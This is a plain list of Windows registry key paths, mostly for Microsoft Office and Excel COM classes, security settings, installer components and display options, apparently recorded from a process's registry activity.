HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Office\ClickToRun\Registry\Machine\Software\Classes\Wow6432Node\CLSID\{9FC8E510-A27C-4B3B-B9A3-BF65F00256A8}\InprocServer32
HKEY_LOCAL_MACHINE\Software\Classes\CLSID\{9FC8E510-A27C-4B3B-B9A3-BF65F00256A8}\InprocServer32
HKEY_CURRENT_USER\Software\Classes\Wow6432Node\CLSID\{9FC8E510-A27C-4B3B-B9A3-BF65F00256A8}\InprocHandler32
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Office\ClickToRun\Registry\Machine\Software\Classes\Wow6432Node\CLSID\{9FC8E510-A27C-4B3B-B9A3-BF65F00256A8}\InprocHandler32
HKEY_LOCAL_MACHINE\Software\Classes\CLSID\{9FC8E510-A27C-4B3B-B9A3-BF65F00256A8}\InprocHandler32
HKEY_CURRENT_USER\Software\Classes\Wow6432Node\CLSID\{9FC8E510-A27C-4B3B-B9A3-BF65F00256A8}\InprocHandler
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Office\ClickToRun\Registry\Machine\Software\Classes\Wow6432Node\CLSID\{9FC8E510-A27C-4B3B-B9A3-BF65F00256A8}\InprocHandler
HKEY_LOCAL_MACHINE\Software\Classes\CLSID\{9FC8E510-A27C-4B3B-B9A3-BF65F00256A8}\InprocHandler
HKEY_CURRENT_USER\Software\Classes\Wow6432Node\CLSID\{9FC8E510-A27C-4B3B-B9A3-BF65F00256A8}\LocalServer32
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Office\ClickToRun\Registry\Machine\Software\Classes\Wow6432Node\CLSID\{9FC8E510-A27C-4B3B-B9A3-BF65F00256A8}\LocalServer32
HKEY_LOCAL_MACHINE\Software\Classes\CLSID\{9FC8E510-A27C-4B3B-B9A3-BF65F00256A8}\LocalServer32
HKEY_CURRENT_USER\Software\Classes\Wow6432Node\CLSID\{9FC8E510-A27C-4B3B-B9A3-BF65F00256A8}\LocalServer
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Office\ClickToRun\Registry\Machine\Software\Classes\Wow6432Node\CLSID\{9FC8E510-A27C-4B3B-B9A3-BF65F00256A8}\LocalServer
HKEY_LOCAL_MACHINE\Software\Classes\CLSID\{9FC8E510-A27C-4B3B-B9A3-BF65F00256A8}\LocalServer
HKEY_CURRENT_USER\Software\Classes\Wow6432Node\CLSID\{9FC8E510-A27C-4B3B-B9A3-BF65F00256A8}\Elevation
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Office\ClickToRun\Registry\Machine\Software\Classes\Wow6432Node\CLSID\{9FC8E510-A27C-4B3B-B9A3-BF65F00256A8}\Elevation
HKEY_LOCAL_MACHINE\Software\Classes\CLSID\{9FC8E510-A27C-4B3B-B9A3-BF65F00256A8}\Elevation
HKEY_CURRENT_USER\Software\Classes\Wow6432Node\CLSID\{9FC8E510-A27C-4B3B-B9A3-BF65F00256A8}\TreatAs
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Office\ClickToRun\Registry\Machine\Software\Classes\Wow6432Node\CLSID\{9FC8E510-A27C-4B3B-B9A3-BF65F00256A8}\TreatAs
HKEY_LOCAL_MACHINE\Software\Classes\CLSID\{9FC8E510-A27C-4B3B-B9A3-BF65F00256A8}\TreatAs
HKEY_LOCAL_MACHINE\Software\Classes\Wow6432Node\CLSID\{9FC8E510-A27C-4B3B-B9A3-BF65F00256A8}\LocalServer32
HKEY_LOCAL_MACHINE\Software\Classes\Wow6432Node\CLSID\{9FC8E510-A27C-4B3B-B9A3-BF65F00256A8}\LocalServer
HKEY_LOCAL_MACHINE\Software\Classes\Wow6432Node\CLSID\{9FC8E510-A27C-4B3B-B9A3-BF65F00256A8}\InProcServer32
HKEY_LOCAL_MACHINE\Software\Classes\Wow6432Node\CLSID\{9FC8E510-A27C-4B3B-B9A3-BF65F00256A8}\InProcServer32\(Default)
HKEY_LOCAL_MACHINE\Software\Classes\Wow6432Node\CLSID\{9FC8E510-A27C-4B3B-B9A3-BF65F00256A8}\InProcHandler
HKEY_LOCAL_MACHINE\Software\Classes\Wow6432Node\CLSID\{9FC8E510-A27C-4B3B-B9A3-BF65F00256A8}\AppID
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Office\ClickToRun\REGISTRY\MACHINE\Software\Microsoft\WindowsRuntime\ActivatableClassId\Windows.Internal.Security.Authentication.OnlineId.MicrosoftAccountWAMExtension
HKEY_LOCAL_MACHINE\Software\Microsoft\WindowsRuntime\ActivatableClassId\Windows.Internal.Security.Authentication.OnlineId.MicrosoftAccountWAMExtension
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Office\ClickToRun\REGISTRY\MACHINE\Software\Microsoft\WindowsRuntime\ActivatableClassId\Windows.Internal.Security.Authentication.OnlineId.MicrosoftAccountWAMExtension\CustomAttributes
HKEY_LOCAL_MACHINE\Software\Microsoft\WindowsRuntime\ActivatableClassId\Windows.Internal.Security.Authentication.OnlineId.MicrosoftAccountWAMExtension\CustomAttributes
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Office\ClickToRun\REGISTRY\MACHINE\Software\Microsoft\WindowsRuntime\ActivatableClassId\Windows.Internal.Security.Authentication.OnlineId.MicrosoftAccountWAMExtensionForUser
HKEY_LOCAL_MACHINE\Software\Microsoft\WindowsRuntime\ActivatableClassId\Windows.Internal.Security.Authentication.OnlineId.MicrosoftAccountWAMExtensionForUser
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Office\ClickToRun\REGISTRY\MACHINE\Software\Microsoft\WindowsRuntime\ActivatableClassId\Windows.Internal.Security.Authentication.OnlineId.MicrosoftAccountWAMExtensionForUser\CustomAttributes
HKEY_LOCAL_MACHINE\Software\Microsoft\WindowsRuntime\ActivatableClassId\Windows.Internal.Security.Authentication.OnlineId.MicrosoftAccountWAMExtensionForUser\CustomAttributes
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Office\ClickToRun\REGISTRY\MACHINE\Software\Microsoft\WindowsRuntime\ActivatableClassId\Windows.Security.Authentication.Web.Core.WebTokenResponse
HKEY_LOCAL_MACHINE\Software\Microsoft\WindowsRuntime\ActivatableClassId\Windows.Security.Authentication.Web.Core.WebTokenResponse
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Office\ClickToRun\REGISTRY\MACHINE\Software\Microsoft\WindowsRuntime\ActivatableClassId\Windows.Security.Authentication.Web.Core.WebTokenResponse\CustomAttributes
HKEY_LOCAL_MACHINE\Software\Microsoft\WindowsRuntime\ActivatableClassId\Windows.Security.Authentication.Web.Core.WebTokenResponse\CustomAttributes
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Office\ClickToRun\REGISTRY\MACHINE\Software\Microsoft\WindowsRuntime\ActivatableClassId\Windows.Security.Authentication.Web.Core.WebProviderError
HKEY_LOCAL_MACHINE\Software\Microsoft\WindowsRuntime\ActivatableClassId\Windows.Security.Authentication.Web.Core.WebProviderError
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Office\ClickToRun\REGISTRY\MACHINE\Software\Microsoft\WindowsRuntime\ActivatableClassId\Windows.Security.Authentication.Web.Core.WebProviderError\CustomAttributes
HKEY_LOCAL_MACHINE\Software\Microsoft\WindowsRuntime\ActivatableClassId\Windows.Security.Authentication.Web.Core.WebProviderError\CustomAttributes
HKEY_USERS\.default\Software\Microsoft\IdentityCRL\AppData\00000000480728C5
HKEY_CURRENT_USER\Software\Classes\Interface\{66B59040-7C93-5F96-B52F-2C098D1557D0}
HKEY_CURRENT_USER\Software\Classes\Wow6432Node\Interface\{66B59040-7C93-5F96-B52F-2C098D1557D0}\ProxyStubClsid32
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Office\ClickToRun\Registry\Machine\Software\Classes\Wow6432Node\Interface\{66B59040-7C93-5F96-B52F-2C098D1557D0}\ProxyStubClsid32
HKEY_LOCAL_MACHINE\Software\Classes\Interface\{66B59040-7C93-5F96-B52F-2C098D1557D0}\ProxyStubClsid32
HKEY_LOCAL_MACHINE\Software\Classes\Interface\{E0798D3D-2B4A-589A-AB12-02DCCC158AFC}
HKEY_CURRENT_USER\Software\Classes\Interface\{199E065C-8195-55DA-9C10-8AEAF9AC1062}
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Office\ClickToRun\Registry\Machine\Software\Classes\Wow6432Node\Interface\{199E065C-8195-55DA-9C10-8AEAF9AC1062}\ProxyStubClsid32
HKEY_LOCAL_MACHINE\Software\Classes\Interface\{199E065C-8195-55DA-9C10-8AEAF9AC1062}\ProxyStubClsid32
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Office\ClickToRun\REGISTRY\MACHINE\SOFTWARE\Microsoft\COM3
HKEY_CURRENT_USER\Software\Classes\Interface\{E1CDD77A-65D3-4DB0-B339-21F6A48CC2FF}
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Office\ClickToRun\Registry\Machine\Software\Classes\Wow6432Node\Interface\{E1CDD77A-65D3-4DB0-B339-21F6A48CC2FF}\ProxyStubClsid32
HKEY_CURRENT_USER\Software\Classes\Interface\{00000035-0000-0000-C000-000000000046}
HKEY_LOCAL_MACHINE\Software\Classes\Interface\{00000035-0000-0000-C000-000000000046}\ProxyStubClsid32
HKEY_CURRENT_USER\Software\Classes\Wow6432Node\Interface\{00000035-0000-0000-C000-000000000046}\ProxyStubClsid32
HKEY_CURRENT_USER\Software\Policies\Microsoft\Office\16.0\Publisher\Internet
HKEY_CURRENT_USER\Software\Microsoft\Office\16.0\Publisher\Internet
HKEY_CURRENT_USER\Software\Policies\Microsoft\Office\16.0\PowerPoint\Internet
HKEY_CURRENT_USER\Software\Microsoft\Office\16.0\PowerPoint\Internet
HKEY_CURRENT_USER\Software\Microsoft\Office\16.0\Common\Internet\AllowPNG
HKEY_CURRENT_USER\Software\Microsoft\Office\16.0\Common\Internet\RelyOnVML
HKEY_CURRENT_USER\Software\Microsoft\Office\16.0\Common\Internet\DownloadComponents
HKEY_CURRENT_USER\Software\Microsoft\Office\16.0\Common\Internet\DoNotUseLongFileNames
HKEY_CURRENT_USER\Software\Microsoft\Office\16.0\Common\Internet\DoNotOrganizeInFolder
HKEY_CURRENT_USER\Software\Policies\Microsoft\Office\16.0\Word\Internet
HKEY_CURRENT_USER\Software\Microsoft\Office\16.0\Word\Internet
HKEY_CURRENT_USER\Software\Microsoft\Office\16.0\Common\Internet\DoNotRelyOnCSS
HKEY_CURRENT_USER\Software\Microsoft\Office\16.0\Common\Internet\PixelsPerInch
HKEY_LOCAL_MACHINE\Software\Wow6432Node\Microsoft\Office\16.0\Common\Internet
HKEY_CURRENT_USER\Software\Microsoft\Office\16.0\Common\Internet\Encoding
HKEY_CURRENT_USER\Software\Policies\Microsoft\Office\16.0\Common\Draw
HKEY_CURRENT_USER\Software\Microsoft\Office\16.0\Common\Draw
HKEY_CURRENT_USER\Software\Microsoft\Office\16.0\Common\Draw\SkipCorruptedDrawingDataOnLoad
HKEY_LOCAL_MACHINE\Software\Policies\Microsoft\Office\16.0\Common\Security
HKEY_CURRENT_USER\Software\Classes\CLSID\{275C23E2-3747-11D0-9FEA-00AA003F8646}
HKEY_LOCAL_MACHINE\Software\Classes\CLSID\{275C23E2-3747-11D0-9FEA-00AA003F8646}
HKEY_LOCAL_MACHINE\Software\Classes\Wow6432Node\CLSID\{275C23E2-3747-11D0-9FEA-00AA003F8646}\LocalServer32
HKEY_LOCAL_MACHINE\Software\Classes\Wow6432Node\CLSID\{275C23E2-3747-11D0-9FEA-00AA003F8646}\LocalServer
HKEY_LOCAL_MACHINE\Software\Classes\Wow6432Node\CLSID\{275C23E2-3747-11D0-9FEA-00AA003F8646}\InProcServer32
HKEY_LOCAL_MACHINE\Software\Classes\Wow6432Node\CLSID\{275C23E2-3747-11D0-9FEA-00AA003F8646}\InProcServer32\(Default)
HKEY_LOCAL_MACHINE\Software\Classes\Wow6432Node\CLSID\{275C23E2-3747-11D0-9FEA-00AA003F8646}\InProcHandler32
HKEY_LOCAL_MACHINE\Software\Classes\Wow6432Node\CLSID\{275C23E2-3747-11D0-9FEA-00AA003F8646}\InProcHandler
HKEY_LOCAL_MACHINE\Software\Classes\Wow6432Node\CLSID\{275C23E2-3747-11D0-9FEA-00AA003F8646}\AppID
HKEY_CURRENT_USER\Software\Microsoft\Office\16.0\Common\Identity\ADUserName
HKEY_CURRENT_USER\Software\Classes\Wow6432Node\CLSID\{275c23e2-3747-11d0-9fea-00aa003f8646}
HKEY_LOCAL_MACHINE\Software\Classes\Wow6432Node\CLSID\{275c23e2-3747-11d0-9fea-00aa003f8646}\InsecureQI
HKEY_CURRENT_USER\Software\Microsoft\Office\16.0\Common\Identity\SignedOutADUser
HKEY_LOCAL_MACHINE\Software\Policies\Microsoft\Office\16.0\Common\OpenXMLFormat\BlockedRelationshipTypes
HKEY_CURRENT_USER\Software\Microsoft\Office\16.0\Common\Roaming\Identities\Anonymous\Settings\1186\{00000000-0000-0000-0000-000000000000}
HKEY_CURRENT_USER\Software\Microsoft\Office\16.0\Common\Roaming\Identities\Anonymous\Settings\1170\{00000000-0000-0000-0000-000000000000}
HKEY_CURRENT_USER\Software\Microsoft\Office\16.0\Excel\Security\FileBlock\FileTypeBlockList
HKEY_CURRENT_USER\Software\Microsoft\Office\16.0\Common\Roaming\RoamingLastWriteTimeExcel
HKEY_CURRENT_USER\Software\Microsoft\Office\16.0\Excel\Security\FileBlock\OoxmlConverters
HKEY_CURRENT_USER\Software\Microsoft\Office\16.0\Excel\Security\FileBlock\OoxmlConverterBlockList
HKEY_CURRENT_USER\Software\Microsoft\Office\16.0\Common\UseNewXmlLiteApi
HKEY_CURRENT_USER\Software\Classes\CLSID\{88D96A0F-F192-11D4-A65F-0040963251E5}
HKEY_LOCAL_MACHINE\Software\Classes\CLSID\{88D96A0F-F192-11D4-A65F-0040963251E5}
HKEY_LOCAL_MACHINE\Software\Classes\Wow6432Node\CLSID\{88D96A0F-F192-11D4-A65F-0040963251E5}\LocalServer32
HKEY_LOCAL_MACHINE\Software\Classes\Wow6432Node\CLSID\{88D96A0F-F192-11D4-A65F-0040963251E5}\LocalServer
HKEY_LOCAL_MACHINE\Software\Classes\Wow6432Node\CLSID\{88D96A0F-F192-11D4-A65F-0040963251E5}\InProcServer32
HKEY_LOCAL_MACHINE\Software\Classes\Wow6432Node\CLSID\{88D96A0F-F192-11D4-A65F-0040963251E5}\InProcServer32\(Default)
HKEY_LOCAL_MACHINE\Software\Classes\Wow6432Node\CLSID\{88D96A0F-F192-11D4-A65F-0040963251E5}\InProcHandler32
HKEY_LOCAL_MACHINE\Software\Classes\Wow6432Node\CLSID\{88D96A0F-F192-11D4-A65F-0040963251E5}\InProcHandler
HKEY_LOCAL_MACHINE\Software\Classes\Wow6432Node\CLSID\{88D96A0F-F192-11D4-A65F-0040963251E5}\AppID
HKEY_CURRENT_USER\Software\Classes\Wow6432Node\CLSID\{88d96a0f-f192-11d4-a65f-0040963251e5}
HKEY_LOCAL_MACHINE\Software\Classes\Wow6432Node\CLSID\{88d96a0f-f192-11d4-a65f-0040963251e5}\InsecureQI
HKEY_CURRENT_USER\Software\Microsoft\Office\16.0\Common\Draw\QFE_FlipPictures
HKEY_CURRENT_USER\Software\Microsoft\Office\16.0\Excel\Options\NetworkResiliency
HKEY_CLASSES_ROOT\CLSID\{0003000C-0000-0000-C000-000000000046}
HKEY_LOCAL_MACHINE\Software\Classes\Wow6432Node\CLSID\{0003000C-0000-0000-C000-000000000046}\IPersistStorageType
HKEY_CURRENT_USER\Software\Microsoft\Office\16.0\Common\MaxPropsStreamSize
HKEY_CURRENT_USER\Software\Policies\Microsoft\Office\16.0\Excel\Security
HKEY_CURRENT_USER\Software\Microsoft\Office\16.0\Excel\Security\VBAWarnings
HKEY_CURRENT_USER\Software\Microsoft\Office\16.0\Excel\Security\Trusted Documents\TrustRecords
HKEY_LOCAL_MACHINE\Software\Policies\Microsoft\Cloud\Office\16.0\Common\OfficeSvcManager
HKEY_CURRENT_USER\Software\Microsoft\Office\16.0\Excel\Security\BlockContentExecutionFromInternet
HKEY_LOCAL_MACHINE\Software\Microsoft\Windows\CurrentVersion\Installer\Managed\S-1-5-21-932793227-1321892499-785312009-1001\Installer\Components\029E403DA86A1D115B5B0006799C897E
HKEY_USERS\S-1-5-21-932793227-1321892499-785312009-1001\Software\Microsoft\Installer\Components\029E403DA86A1D115B5B0006799C897E
HKEY_LOCAL_MACHINE\Software\Classes\Installer\Components\029E403DA86A1D115B5B0006799C897E
HKEY_LOCAL_MACHINE\Software\Classes\Installer\Components\029E403DA86A1D115B5B0006799C897E\vbe.dll_7.1
HKEY_LOCAL_MACHINE\Software\Microsoft\Windows\CurrentVersion\Installer\Managed\S-1-5-21-932793227-1321892499-785312009-1001\Installer\Features\00006109F00000000000000000F01FEC
HKEY_USERS\S-1-5-21-932793227-1321892499-785312009-1001\Software\Microsoft\Installer\Features\00006109F00000000000000000F01FEC
HKEY_LOCAL_MACHINE\Software\Classes\Installer\Features\00006109F00000000000000000F01FEC
HKEY_LOCAL_MACHINE\Software\Classes\Installer\Features\00006109F00000000000000000F01FEC\VBAFiles
HKEY_LOCAL_MACHINE\Software\Microsoft\Windows\CurrentVersion\Installer\UserData\S-1-5-18\Products\00006109F00000000000000000F01FEC\Features
HKEY_LOCAL_MACHINE\Software\Microsoft\Windows\CurrentVersion\Installer\UserData\S-1-5-18\Products\00006109F00000000000000000F01FEC\Features\VBAFiles
HKEY_LOCAL_MACHINE\Software\Microsoft\Windows\CurrentVersion\Installer\UserData\S-1-5-18\Components\832C86ABC73443044BA758069DBCC6E5
HKEY_LOCAL_MACHINE\Software\Microsoft\Windows\CurrentVersion\Installer\UserData\S-1-5-18\Components\832C86ABC73443044BA758069DBCC6E5\00006109F00000000000000000F01FEC
HKEY_LOCAL_MACHINE\Software\Microsoft\Windows\CurrentVersion\Installer\UserData\S-1-5-18\Components\EB0C8A90D0D34D14FAB6CF05A69BBEF1
HKEY_LOCAL_MACHINE\Software\Microsoft\Windows\CurrentVersion\Installer\UserData\S-1-5-18\Components\EB0C8A90D0D34D14FAB6CF05A69BBEF1\00006109F00000000000000000F01FEC
HKEY_LOCAL_MACHINE\Software\Microsoft\Windows\CurrentVersion\Installer\UserData\S-1-5-18\Components\206169712E4CE28408A0FDE6265794FC
HKEY_LOCAL_MACHINE\Software\Microsoft\Windows\CurrentVersion\Installer\UserData\S-1-5-18\Components\206169712E4CE28408A0FDE6265794FC\00006109F00000000000000000F01FEC
HKEY_LOCAL_MACHINE\Software\Microsoft\Windows\CurrentVersion\Installer\UserData\S-1-5-18\Components\FFC7844B38D726447AE1F693823C83FA
HKEY_LOCAL_MACHINE\Software\Microsoft\Windows\CurrentVersion\Installer\UserData\S-1-5-18\Components\FFC7844B38D726447AE1F693823C83FA\00006109F00000000000000000F01FEC
HKEY_LOCAL_MACHINE\Software\Microsoft\Windows\CurrentVersion\Installer\UserData\S-1-5-18\Components\139C3899EB73E6C3DA23B8E687B98618
HKEY_LOCAL_MACHINE\Software\Microsoft\Windows\CurrentVersion\Installer\UserData\S-1-5-18\Components\139C3899EB73E6C3DA23B8E687B98618\00006109F00000000000000000F01FEC
HKEY_LOCAL_MACHINE\Software\Microsoft\Windows\CurrentVersion\Installer\UserData\S-1-5-18\Components\339F228ED07C4FC39AD227368BCAFC03
HKEY_LOCAL_MACHINE\Software\Microsoft\Windows\CurrentVersion\Installer\UserData\S-1-5-18\Components\339F228ED07C4FC39AD227368BCAFC03\00006109F00000000000000000F01FEC
HKEY_LOCAL_MACHINE\Software\Microsoft\Windows\CurrentVersion\Installer\UserData\S-1-5-18\Components\6CDA7FFC8F2164F40BC5A96F5A154C25
HKEY_LOCAL_MACHINE\Software\Microsoft\Windows\CurrentVersion\Installer\UserData\S-1-5-18\Components\6CDA7FFC8F2164F40BC5A96F5A154C25\00006109F00000000000000000F01FEC
HKEY_LOCAL_MACHINE\Software\Microsoft\Windows\CurrentVersion\Installer\UserData\S-1-5-18\Products\00006109F00000000000000000F01FEC\Usage
HKEY_CURRENT_USER\Software\Microsoft\VBA\Security
HKEY_CURRENT_USER\Software\Policies\Microsoft\VBA\Security
HKEY_CURRENT_USER\Software\Microsoft\Office\16.0\Common\TrustCenter\TrustBar
HKEY_CURRENT_USER\Software\Classes\CLSID\{54E211B6-3650-4F75-8334-FA359598E1C5}
HKEY_LOCAL_MACHINE\Software\Classes\CLSID\{54E211B6-3650-4F75-8334-FA359598E1C5}
HKEY_LOCAL_MACHINE\Software\Classes\Wow6432Node\CLSID\{54E211B6-3650-4F75-8334-FA359598E1C5}\LocalServer32
HKEY_LOCAL_MACHINE\Software\Classes\Wow6432Node\CLSID\{54E211B6-3650-4F75-8334-FA359598E1C5}\LocalServer
HKEY_LOCAL_MACHINE\Software\Classes\Wow6432Node\CLSID\{54E211B6-3650-4F75-8334-FA359598E1C5}\InProcServer32
HKEY_LOCAL_MACHINE\Software\Classes\Wow6432Node\CLSID\{54E211B6-3650-4F75-8334-FA359598E1C5}\InProcServer32\(Default)
HKEY_LOCAL_MACHINE\Software\Classes\Wow6432Node\CLSID\{54E211B6-3650-4F75-8334-FA359598E1C5}\InProcHandler32
HKEY_LOCAL_MACHINE\Software\Classes\Wow6432Node\CLSID\{54E211B6-3650-4F75-8334-FA359598E1C5}\InProcHandler
HKEY_LOCAL_MACHINE\Software\Classes\Wow6432Node\CLSID\{54E211B6-3650-4F75-8334-FA359598E1C5}\AppID
HKEY_CURRENT_USER\Software\Microsoft\Office\16.0\Excel\Options\DrawInkTab
HKEY_CURRENT_USER\Software\Microsoft\Office\16.0\Common\Draw\CanvasInkOverride
HKEY_CURRENT_USER\Software\Microsoft\Office\16.0\Excel\Options\AnimationDiagnostic
HKEY_CURRENT_USER\Software\Microsoft\Office\16.0\Common\General\NoTrack
HKEY_CURRENT_USER\Software\Policies\Microsoft\Office\16.0\Common\ReviewCycle
HKEY_CURRENT_USER\Software\Microsoft\Office\16.0\Common\ReviewCycle
HKEY_CURRENT_USER\Software\Microsoft\Office\16.0\Common\ReviewCycle\ReviewToken
HKEY_CURRENT_USER\Software\Microsoft\Office\16.0\Excel\Options\FullCalcOnLoadOldFile
HKEY_CURRENT_USER\Control Panel\Desktop
HKEY_CURRENT_USER\Control Panel\Desktop\CaretWidth
HKEY_CURRENT_USER\Control Panel\Desktop\CursorBlinkRate
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\LanguagePack\SurrogateFallback
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\LanguagePack\SurrogateFallback\Plane2
HKEY_CURRENT_USER\Software\Microsoft\Office\16.0\Common\PreferOTFontIcon
HKEY_CURRENT_USER\Software\Microsoft\Office\Common\ReversedArrowTypeBracketsBraceOnBinarySave
HKEY_CURRENT_USER\Software\Microsoft\Office\16.0\Common\Draw\ConvertRRectCalloutToFreeformForInscribedRect
HKEY_CURRENT_USER\Software\Microsoft\Office\16.0\Common\Draw\ConvertChevronToFreeformForInscribedRect
HKEY_CURRENT_USER\Software\Policies\Microsoft\Office\Common\Smart Tag
HKEY_CURRENT_USER\Software\Microsoft\Office\Common\Smart Tag
HKEY_CURRENT_USER\Software\Microsoft\Office\Common\Smart Tag\DisableDocumentAssemblies
HKEY_CURRENT_USER\Software\Classes\CLSID\{CACAF262-9370-4615-A13B-9F5539DA4C0A}
HKEY_LOCAL_MACHINE\Software\Classes\CLSID\{CACAF262-9370-4615-A13B-9F5539DA4C0A}
HKEY_LOCAL_MACHINE\Software\Classes\Wow6432Node\CLSID\{CACAF262-9370-4615-A13B-9F5539DA4C0A}\LocalServer32
HKEY_LOCAL_MACHINE\Software\Classes\Wow6432Node\CLSID\{CACAF262-9370-4615-A13B-9F5539DA4C0A}\LocalServer
HKEY_LOCAL_MACHINE\Software\Classes\Wow6432Node\CLSID\{CACAF262-9370-4615-A13B-9F5539DA4C0A}\InProcServer32
HKEY_LOCAL_MACHINE\Software\Classes\Wow6432Node\CLSID\{CACAF262-9370-4615-A13B-9F5539DA4C0A}\InProcServer32\(Default)
HKEY_LOCAL_MACHINE\Software\Classes\Wow6432Node\CLSID\{CACAF262-9370-4615-A13B-9F5539DA4C0A}\InProcHandler32
HKEY_LOCAL_MACHINE\Software\Classes\Wow6432Node\CLSID\{CACAF262-9370-4615-A13B-9F5539DA4C0A}\InProcHandler
HKEY_LOCAL_MACHINE\Software\Classes\Wow6432Node\CLSID\{CACAF262-9370-4615-A13B-9F5539DA4C0A}\AppID
HKEY_CURRENT_USER\Software\Classes\Wow6432Node\CLSID\{cacaf262-9370-4615-a13b-9f5539da4c0a}
HKEY_LOCAL_MACHINE\Software\Classes\Wow6432Node\CLSID\{cacaf262-9370-4615-a13b-9f5539da4c0a}\InsecureQI
HKEY_CURRENT_USER\Software\Microsoft\Office\16.0\Excel\Security\BlockOleAutoActivate
HKEY_CURRENT_USER\SOFTWARE\Microsoft\OneDrive
HKEY_CURRENT_USER\Software\Policies\Microsoft\Windows\CurrentVersion\Policies\Comdlg32
HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Policies\Comdlg32
HKEY_CLASSES_ROOT\PackagedCom\ClassIndex\{71DCE5D6-4B57-496B-AC21-CD5B54EB93FD}
HKEY_CURRENT_USER\Software\Policies\Microsoft\Office\Common\Workflow\Cache
HKEY_CURRENT_USER\Software\Microsoft\Office\Common\Workflow\Cache
HKEY_CURRENT_USER\Software\Microsoft\Office\Common\Workflow\WorkgroupCache
HKEY_CURRENT_USER\Software\Microsoft\Office\16.0\Excel\Options\CreateVbeProjOnLoad
HKEY_CURRENT_USER\Software\Microsoft\Office\Common\Smart Tag\DisableSmartDocuments
HKEY_CURRENT_USER\Software\Microsoft\Office\16.0\Excel\Security\FileBlock\XL97WorkbooksandTemplates
HKEY_CURRENT_USER\Software\Microsoft\Office\16.0\Excel\Resiliency\DocumentRecovery\23F3A4E
HKEY_CURRENT_USER\Software\Microsoft\Office\16.0\Excel\Resiliency\DocumentRecovery\23F3A4E\23F3A4E
HKEY_CURRENT_USER\Software\Classes\CLSID\{0E5AAE11-A475-4C5B-AB00-C66DE400274E}
HKEY_LOCAL_MACHINE\Software\Classes\CLSID\{0E5AAE11-A475-4C5B-AB00-C66DE400274E}
HKEY_LOCAL_MACHINE\Software\Classes\Wow6432Node\CLSID\{0E5AAE11-A475-4C5B-AB00-C66DE400274E}\LocalServer32
HKEY_LOCAL_MACHINE\Software\Classes\Wow6432Node\CLSID\{0E5AAE11-A475-4C5B-AB00-C66DE400274E}\LocalServer
HKEY_LOCAL_MACHINE\Software\Classes\Wow6432Node\CLSID\{0E5AAE11-A475-4C5B-AB00-C66DE400274E}\InProcServer32
HKEY_LOCAL_MACHINE\Software\Classes\Wow6432Node\CLSID\{0E5AAE11-A475-4C5B-AB00-C66DE400274E}\InProcServer32\(Default)
HKEY_LOCAL_MACHINE\Software\Classes\Wow6432Node\CLSID\{0E5AAE11-A475-4C5B-AB00-C66DE400274E}\InProcHandler32
HKEY_LOCAL_MACHINE\Software\Classes\Wow6432Node\CLSID\{0E5AAE11-A475-4C5B-AB00-C66DE400274E}\InProcHandler
HKEY_LOCAL_MACHINE\Software\Classes\Wow6432Node\CLSID\{0E5AAE11-A475-4C5B-AB00-C66DE400274E}\AppID
HKEY_CURRENT_USER\Software\Classes\CLSID\{4DF0C730-DF9D-4AE3-9153-AA6B82E9795A}
HKEY_LOCAL_MACHINE\Software\Classes\CLSID\{4DF0C730-DF9D-4AE3-9153-AA6B82E9795A}
HKEY_LOCAL_MACHINE\Software\Classes\Wow6432Node\CLSID\{4DF0C730-DF9D-4AE3-9153-AA6B82E9795A}\LocalServer32
HKEY_LOCAL_MACHINE\Software\Classes\Wow6432Node\CLSID\{4DF0C730-DF9D-4AE3-9153-AA6B82E9795A}\LocalServer
HKEY_LOCAL_MACHINE\Software\Classes\Wow6432Node\CLSID\{4DF0C730-DF9D-4AE3-9153-AA6B82E9795A}\InProcServer32
HKEY_LOCAL_MACHINE\Software\Classes\Wow6432Node\CLSID\{4DF0C730-DF9D-4AE3-9153-AA6B82E9795A}\InProcServer32\(Default)
HKEY_LOCAL_MACHINE\Software\Classes\Wow6432Node\CLSID\{4DF0C730-DF9D-4AE3-9153-AA6B82E9795A}\InProcHandler32
HKEY_LOCAL_MACHINE\Software\Classes\Wow6432Node\CLSID\{4DF0C730-DF9D-4AE3-9153-AA6B82E9795A}\InProcHandler
HKEY_LOCAL_MACHINE\Software\Classes\Wow6432Node\CLSID\{4DF0C730-DF9D-4AE3-9153-AA6B82E9795A}\AppID
HKEY_CURRENT_USER\Software\Microsoft\Office\16.0\Excel\Options\QFE_Kobe
HKEY_CURRENT_USER\Software\Policies\Microsoft\Office\16.0\Common\FileIO
HKEY_CURRENT_USER\Software\Microsoft\Office\16.0\Common\FileIO
HKEY_CURRENT_USER\Software\Policies\Microsoft\Office\16.0\Common\Options
HKEY_CURRENT_USER\Software\Microsoft\Office\16.0\Common\Options
HKEY_CURRENT_USER\Software\Microsoft\Office\16.0\Common\Toolbars\CustomUIRoaming
HKEY_CURRENT_USER\Software\Microsoft\Office\16.0\Common\Toolbars\Animation
HKEY_CURRENT_USER\Software\Microsoft\Office\16.0\Common\Toolbars\ShowKbdShortcuts
HKEY_CURRENT_USER\Software\Microsoft\Office\16.0\Common\Toolbars\FontView
HKEY_CURRENT_USER\Software\Microsoft\Office\16.0\Excel\Options\AirSpaceOArtEnable
HKEY_CURRENT_USER\Software\Microsoft\Office\16.0\Common\HitTestOverlayUnselectedColor
